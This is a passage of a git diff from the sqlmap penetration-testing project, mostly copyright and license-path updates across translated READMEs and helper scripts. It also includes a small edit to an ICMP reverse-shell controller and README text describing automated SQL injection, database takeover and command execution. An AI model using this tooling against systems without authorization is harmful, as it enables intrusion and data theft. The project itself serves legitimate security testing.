* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
|
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
||||||
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
||||||
|
|||||||
50
doc/translations/README-pl-PL.md
Normal file
50
doc/translations/README-pl-PL.md
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
|
||||||
|
|
||||||
|
Zrzuty ekranowe
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
|
||||||
|
|
||||||
|
Instalacja
|
||||||
|
----
|
||||||
|
|
||||||
|
Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6.x** lub **2.7.x** na dowolnej platformie systemowej.
|
||||||
|
|
||||||
|
Sposób użycia
|
||||||
|
----
|
||||||
|
|
||||||
|
Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
|
||||||
|
Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
|
Odnośniki
|
||||||
|
----
|
||||||
|
|
||||||
|
* Strona projektu: http://sqlmap.org
|
||||||
|
* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||||
|
|
||||||
|
|||||||
50
doc/translations/README-ru-RUS.md
Normal file
50
doc/translations/README-ru-RUS.md
Normal file
@@ -0,0 +1,50 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
|
||||||
|
|
||||||
|
Скриншоты
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki.
|
||||||
|
|
||||||
|
Установка
|
||||||
|
----
|
||||||
|
|
||||||
|
Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий:
|
||||||
|
|
||||||
|
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе.
|
||||||
|
|
||||||
|
Использование
|
||||||
|
----
|
||||||
|
|
||||||
|
Чтобы получить список основных опций и вариантов выбора, используйте:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Чтобы получить список всех опций и вариантов выбора, используйте:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601).
|
||||||
|
Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
|
Ссылки
|
||||||
|
----
|
||||||
|
|
||||||
|
* Основной сайт: http://sqlmap.org
|
||||||
|
* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -3,8 +3,8 @@
|
|||||||
"""
|
"""
|
||||||
beep.py - Make a beep sound
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
4
extra/cloak/cloak.py
Executable file → Normal file
4
extra/cloak/cloak.py
Executable file → Normal file
@@ -3,8 +3,8 @@
|
|||||||
"""
|
"""
|
||||||
cloak.py - Simple file encryption/compression utility
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -3,8 +3,8 @@
|
|||||||
"""
|
"""
|
||||||
dbgtool.py - Portable executable to ASCII debug script converter
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|||||||
0
extra/icmpsh/icmpsh-m.pl
Executable file → Normal file
0
extra/icmpsh/icmpsh-m.pl
Executable file → Normal file
@@ -80,7 +80,7 @@ def main(src, dst):
|
|||||||
cmd = ''
|
cmd = ''
|
||||||
|
|
||||||
# Wait for incoming replies
|
# Wait for incoming replies
|
||||||
if sock in select.select([ sock ], [], [])[0]:
|
if sock in select.select([sock], [], [])[0]:
|
||||||
buff = sock.recv(4096)
|
buff = sock.recv(4096)
|
||||||
|
|
||||||
if 0 == len(buff):
|
if 0 == len(buff):
|
||||||
@@ -125,8 +125,12 @@ def main(src, dst):
|
|||||||
# Have the IP packet contain the ICMP packet (along with its payload)
|
# Have the IP packet contain the ICMP packet (along with its payload)
|
||||||
ip.contains(icmp)
|
ip.contains(icmp)
|
||||||
|
|
||||||
# Send it to the target host
|
try:
|
||||||
sock.sendto(ip.get_packet(), (dst, 0))
|
# Send it to the target host
|
||||||
|
sock.sendto(ip.get_packet(), (dst, 0))
|
||||||
|
except socket.error, ex:
|
||||||
|
sys.stderr.write("'%s'\n" % ex)
|
||||||
|
sys.stderr.flush()
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
if len(sys.argv) < 3:
|
if len(sys.argv) < 3:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
@@ -43,7 +43,7 @@ def updateMSSQLXML():
|
|||||||
|
|
||||||
return
|
return
|
||||||
|
|
||||||
releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
|
releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
|
||||||
releasesCount = len(releases)
|
releasesCount = len(releases)
|
||||||
|
|
||||||
# Create the minidom document
|
# Create the minidom document
|
||||||
@@ -74,7 +74,7 @@ def updateMSSQLXML():
|
|||||||
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
|
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
|
||||||
|
|
||||||
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
|
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
|
||||||
servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
|
servicepackVersion = re.findall(r"</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
|
||||||
|
|
||||||
for servicePack, version in servicepackVersion:
|
for servicePack, version in servicepackVersion:
|
||||||
if servicePack.startswith(" "):
|
if servicePack.startswith(" "):
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -3,8 +3,8 @@
|
|||||||
"""
|
"""
|
||||||
safe2bin.py - Simple safe(hex) to binary format converter
|
safe2bin.py - Simple safe(hex) to binary format converter
|
||||||
|
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import binascii
|
import binascii
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
# Removes trailing spaces from blank lines inside project files
|
# Removes trailing spaces from blank lines inside project files
|
||||||
find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
|
find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
|
||||||
|
|||||||
4
extra/shutils/duplicates.py
Normal file → Executable file
4
extra/shutils/duplicates.py
Normal file → Executable file
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
# Removes duplicate entries in wordlist like files
|
# Removes duplicate entries in wordlist like files
|
||||||
|
|
||||||
|
|||||||
30
extra/shutils/newlines.py
Normal file
30
extra/shutils/newlines.py
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
#! /usr/bin/env python
|
||||||
|
|
||||||
|
# Runs pylint on all python scripts found in a directory tree
|
||||||
|
# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
|
||||||
|
def check(filepath):
|
||||||
|
if filepath.endswith(".py"):
|
||||||
|
content = open(filepath, "rb").read()
|
||||||
|
|
||||||
|
if "\n\n\n" in content:
|
||||||
|
index = content.find("\n\n\n")
|
||||||
|
print filepath, repr(content[index - 30:index + 30])
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
try:
|
||||||
|
BASE_DIRECTORY = sys.argv[1]
|
||||||
|
except IndexError:
|
||||||
|
print "no directory specified, defaulting to current working directory"
|
||||||
|
BASE_DIRECTORY = os.getcwd()
|
||||||
|
|
||||||
|
print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
|
||||||
|
for root, dirs, files in os.walk(BASE_DIRECTORY):
|
||||||
|
if any(_ in root for _ in ("extra", "thirdparty")):
|
||||||
|
continue
|
||||||
|
for name in files:
|
||||||
|
filepath = os.path.join(root, name)
|
||||||
|
check(filepath)
|
||||||
@@ -1,7 +0,0 @@
|
|||||||
#!/bin/bash
|
|
||||||
|
|
||||||
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
|
||||||
# See the file 'doc/COPYING' for copying permission
|
|
||||||
|
|
||||||
# Runs pep8 on all python files (prerequisite: apt-get install pep8)
|
|
||||||
